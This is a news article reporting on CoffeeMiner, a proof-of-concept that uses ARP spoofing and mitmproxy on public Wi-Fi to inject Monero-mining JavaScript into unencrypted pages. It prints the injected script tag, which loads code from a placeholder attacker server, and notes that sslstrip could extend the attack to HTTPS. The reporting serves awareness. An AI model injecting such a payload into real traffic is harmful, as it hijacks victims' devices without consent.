Thanks to the ridiculous valuation of Bitcoin and other cryptocurrencies, cryptomining code has become a common mechanism for converting authorized and stolen computing cycles into potential cash.

Antivirus and ad-blocker makers have responded by trying to halt crafty coin-crafting code from hijacking CPU time, particularly in browsers.

For those interested in violating computer laws – please, don't – and those interested in computer security research projects, a developer named Arnau, based in Spain, has published a proof-of-concept walkthrough for hacking public Wi-Fi networks to inject crypto-mining code in connected browsing sessions.

CoffeeMiner is a project that allows the sort of man-in-the-middle attack that has been used by cyber thieves in Starbucks cafes and doubtless elsewhere.

The CoffeeMiner script is designed to spoof Address Resolution Protocol (ARP) messages on a local area network in order to intercept unencrypted traffic from other devices on the network.

It turn conducts a man-in-the-middle attack using software called mitmproxy to inject the following line of HTML code into non-HTTPS, or otherwise non-encrypted, webpages requested by others on the networks:

<script src="http://httpserverIP:8000/script.js" type="text/javascript"></script>

When loaded, these webpages run the JavaScript and siphon CPU time to generate Monero, a cryptocurrency, using CoinHive's crypto-mining software.

As Arnau explained, the attack – demonstrated on a VirtualBox set up rather than in the wild – can be automated. The published version doesn't work with requests for HTTPS webpages, though the addition of sslstrip could solve that.

The code, mostly Python, is available on GitHub. ®